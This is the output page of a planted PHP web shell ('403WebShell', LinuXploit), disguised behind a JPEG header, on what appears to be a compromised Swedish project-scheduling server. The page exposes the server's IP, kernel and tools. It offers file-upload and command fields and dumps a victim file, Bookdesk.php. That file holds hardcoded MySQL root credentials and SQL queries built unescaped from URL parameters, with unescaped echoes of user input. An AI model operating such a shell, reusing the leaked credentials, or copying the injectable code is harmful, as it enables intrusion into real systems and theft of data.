????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.217
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/project/project/schedule/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/icad.astacus.se/project/project/schedule/Bookdesk.php
<?php
$link = mysql_connect ("localhost", "root", "root123");
mysql_select_db ("vpa");

if($_GET['action'] == "close"){
   
 echo "<script> window.opener.location.reload();window.close();</script>";	
	}
	
if($_GET['action'] == "found"){
   
 echo "<script> alert('Sorry, there is another project booked for this desk!');</script>";	
	}


	  $deskname = $_GET['DeskName'];
	  $sql = "SELECT * FROM Desks where Name = '$deskname'";
	  $result = mysql_query($sql);
	  while ($row = mysql_fetch_assoc($result)){ 
	  		$DeskId = $row['DeskId'];
	  }
	  
	  $Startdate = $_GET['Startdate'];
	  
	   $sql = "SELECT * FROM DeskSchedule where DeskId = '$DeskId' and DeskDate = '$Startdate'";
	  $result = mysql_query($sql);
	  while ($row = mysql_fetch_assoc($result)){ 
	  		$ProjectId = $row['ProjectId'];
	  }
	  
	   $sql = "SELECT * FROM Project where ProjectId = '$ProjectId'";
	  $result = mysql_query($sql);
	  while ($row = mysql_fetch_assoc($result)){ 
	  		$ProjectId = $row['ProjectId'];
			$CompanyId = $row['CompanyId'];
			$Name = $row['Name'];
	  }
	  
?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252" />
<title>Untitled Document</title>
<style type="text/css">
.style6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; }
#calendar_icon {	
	vertical-align: middle;
			cursor: pointer;
}
.text {
	font-family: Verdana, Geneva, sans-serif;
}
.text {
	font-size: 12px;
}
</style>
<script type="text/javascript" language="javascript" src="../jquery-1.12.4.js"></script>
<link rel="stylesheet" type="text/css" href="../dhtmlxCalendar/codebase/dhtmlxcalendar.css"/>
<script src="../dhtmlxCalendar/codebase/dhtmlxcalendar.js"></script>

<script>
function setId(){
	document.getElementById("projectid").value =  document.getElementById("customerlist").options[document.getElementById("customerlist").selectedIndex].value;
}


var myCalendar;
		function doOnLoad() {
			myCalendar = new dhtmlXCalendarObject({input: "enddate", button: "calendar_icon"});
			
		}
function MM_jumpMenu(targ,selObj,restore){ //v3.0

document.getElementById("projectid").value =  selObj.options[selObj.selectedIndex].value;


}

function validateForm()
{

  
  var x1=document.forms["form1"]["projectid"].value;
  var x2=document.forms["form1"]["enddate"].value;
  var x3=document.forms["form1"]["startdate"].value;
 
 if(x2 < x3){
	 alert("End date must be after start date!");
  		return false;
	}

	if(x1 == "" || x2 == ""){
	  alert("You have to enter end date and project id!");
  		return false;
	}

	
 
    return true;
  
}

</script>
</head>

<body onload="doOnLoad();">
<form id="form1" name="form1" method="get" action="addbooking.php" onsubmit="return validateForm()">
  <table width="574" border="0" cellspacing="0" cellpadding="0">
    <tr>
      <td height="44" colspan="5" class="text">
      <?php
      
	  if($Name != ""){
		  
		 echo("Project: <strong>".$CompanyId."_$Name ($ProjectId)</strong> is booked!"); 
		 }else{
			echo("No project is booked on this desk with the start date: $Startdate"); 
			}
	  
	  ?>
      
      </td>
    </tr>
    <tr>
      <td colspan="5"><span class="text">Team: <?php echo($_GET['DeskName']);?>
          <input name="deskname" type="hidden" id="deskname" size="12" value="<?php echo($_GET['DeskName']);?>" />
      </span></td>
    </tr>
    <tr>
      <td colspan="2"><span class="text">Start date: <?php echo($_GET['Startdate']);?>
        <input name="startdate" type="hidden" id="startdate" size="12" value="<?php echo($_GET['Startdate']);?>" />
      </span></td>
      <td width="74"><span class="text">End date:</span></td>
      <td><span class="text"><img src="../calendar.gif" alt="" id="calendar_icon" border="0" /></span></td>
      <td><span class="text">
        <input name="enddate" type="text" id="enddate" size="12" />
      </span></td>
    </tr>
    <tr>
      <td colspan="5">&nbsp;</td>
    </tr>
    <tr>
      <td width="90"><span class="text">Project Id:</span></td>
      <td colspan="2"><input name="SearchBox" type="text" id="SearchBox" size="5" />
        <select name="customerlist" id="customerlist" onchange="MM_jumpMenu('parent',this,0)">
          <option  selected="selected">All</option>
          <?php
                
						 $sql = "SELECT * FROM Project WHERE not Project.Description = 'iCAD-Project' order by Project.ProjectId desc LIMIT 300 ";
		
		$x = 0;
	$result = mysql_query($sql);
	  while ($row = mysql_fetch_assoc($result)){ 
	  

				
				?>
          <option value="<?php echo($row['ProjectId']);?>"> <?php echo($row['CompanyId']."_".substr($row['Name'],0,25) . " (".$row['ProjectId'].")")?></option>
          <?php }?>
        </select>
        <input type="button" name="button" id="button" value="&gt;&gt;" onclick="setId();" /></td>
      <td width="18">&nbsp;</td>
      <td width="87"><span class="text">
        <input name="projectid" type="text" id="projectid" size="12" />
      </span></td>
    </tr>
    <tr>
      <td colspan="5">&nbsp;</td>
    </tr>
    <tr>
      <td>&nbsp;</td>
      <td width="305">&nbsp;</td>
      <td>&nbsp;</td>
      <td>&nbsp;</td>
      <td><input type="submit" name="button2" id="button2" value="Book!" /></td>
    </tr>
  </table>
</form>
</body>
</html>

<script>
var showOnlyOptionsSimilarToText = function (selectionEl, str, isCaseSensitive) {
	if (isCaseSensitive)
		str = str.toLowerCase();
	// cache the jQuery object of the <select> element
	var $el = $(selectionEl);
	if (!$el.data("options")) {
		// cache all the options inside the <select> element for easy recover
		$el.data("options", $el.find("option").clone());
	}
	var newOptions = $el.data("options").filter(function () {
			var text = $(this).text();
			if (isCaseSensitive)
				text = text.toLowerCase();
			return text.match(str);
		});
	$el.empty().append(newOptions);
};

$("#SearchBox").on("keyup", function () {
	var userInput = $("#SearchBox").val();
	showOnlyOptionsSimilarToText($("#customerlist"), userInput, true);
});



</script>

Youez - 2016 - github.com/yon3zu
LinuXploit